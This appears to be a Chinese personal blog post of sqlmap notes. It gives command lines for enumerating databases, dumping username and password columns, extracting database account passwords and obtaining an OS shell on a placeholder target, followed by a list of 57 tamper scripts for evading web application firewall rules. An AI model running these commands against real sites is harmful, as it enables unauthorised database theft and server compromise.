sqlmap 笔记


首先先推一下sqlmap下载地址,网上很多资源存在问题(我甚至遇到了不支持py3的)

http://sqlmap.org

没错的话这个应该是官方的了



一个压缩包一个git


SQLmap  常用笔记

--batch 加上这个参数则会自动确认所有选项 

检测注入点是否可用        sqlmap.py -u http://www.aaaa.com/text.php?id=22

列出所有数据库        sqlmap.py -u http://www.aaaa.com/text.php?id=22 --dbs

列出指定库的表        sqlmap.py -u http://www.aaaa.com/text.php?id=22 -D dbs --tables

列出指定表的字段        sqlmap.py -u http://www.aaaa.com/text.php?id=22 -D dbs -T user --columns

猜字段内容        sqlmap.py -u http://www.aaaa.com/text.php?id=22 -D dbs -T user -C name,password --dump

--current-db 当前网站使用的数据库

--current-user 当前用户

 --users     列所有用户

--passwords    爆数据库账户密码 

--start 1 --stop 10 --dump  限制条数(爆的过多容易喝茶) 

–dbms mysql –level 3 确定数据库类型/测试等级

--os-shell 拿 shell


WEF的检测规则。
下面给出全部脚本并进行分类:
序号 脚本名称 注释
1 0x2char 将每个编码后的字符转换为等价表达
2 apostrophemask 替换为Utf8字符,用于过滤单引号
3 apostrophenullencode 使用unicode字符替换单引号
4 appendnullbyte 有效负载的结束位置加载零字节字符编码
5 base64encode 字符替换为base64编码
6 between (>)替换为between,between and替换(=)
7 bluecoat 在sql语句中用随机空白字符替换为空格,用like替换等号
8 chardoubleencode 使用双url编码(不处理已经编码的字符)
9 charencode 将url编码
10 charunicodeencode 字符串unicode编码
11 charunicodeescape 以指定的payload反向编码未编码的字符
12 commalesslimit 改变limit语句的写法
13 commalessmid 改变mid语句的写法
14 commentbeforeparentheses 在括号前加内联注释
15 concat2concatws 替换CONCAT为CONCAT_WS
16 equaltolike 等号替换为like
17 escapequotes 双引号替换为\\
18 greatest 大于号替换为greatest
19 halfversionedmorekeywords 在每个关键字前加注释
20 htmlencode html编码所有非字母和数字的字符
21 ifnull2casewhenisnull 改变ifnull语句的写法
22 ifnull2ifisnull 替换ifnull为if(isnull(A))
23 informationschemacomment 标示符后添加注释
24 least 替换大于号为least
25 lowercase 全部替换为小写值
26 modsecurityversioned 空格替换为查询版本的注释
27 modsecurityzeroversioned 添加完整的查询版本的注释
28 multiplespaces 围绕sql关键字添加多个空格
29 nonrecursivereplacement 替换预定义的关键字
30 overlongutf8 将所有字符转义为utf8
31 overlongutf8more 以指定的payload转换所有字符
32 percentage 每个字符前添加%
33 plus2concat 将加号替换为concat函数
34 plus2fnconcat 将加号替换为ODBC函数{fn CONCAT()}
35 randomcase 字符大小写随机替换
36 randomcomments //分割关键字
37 securesphere 添加特制的字符串
38 sp_password 追加sp_password字符串
39 space2comment 空格替换为//
40 space2dash 空格替换为–加随机字符
41 space2hash 空格替换为#加随机字符
42 space2morecomment 空格替换为/_/
43 space2morehash 空格替换为#并添加一个随机字符及换行符
44 space2mssqlblank 空格替换为其他空符号
45 space2mssqlhash 空格替换为%23%0A
46 space2mysqlblank 空格替换为其他空白符号
47 space2mysqldash 空格替换为–%0A
48 space2plus 空格用加号替换
49 space2randomblank 空格替换为备选字符集中的随机字符
50 symboliclogical AND和OR替换为&&和||
51 unionalltounion union all select替换为union select
52 unmagicquotes 宽字符绕过GPC
53 uppercase 全部替换为大写值
54 varnish 添加HTTP头
55 versionedkeywords 用注释封装每个非函数的关键字
56 versionedmorekeywords 使用注释绕过
57 xforwardedfor 添加伪造的HTTP头

声明:阿硕的博客|版权所有,违者必究|如未注明,均为原创|本网站采用BY-NC-SA协议进行授权

转载:转载请注明原文链接 - sqlmap 笔记


Carpe Diem and Do what I like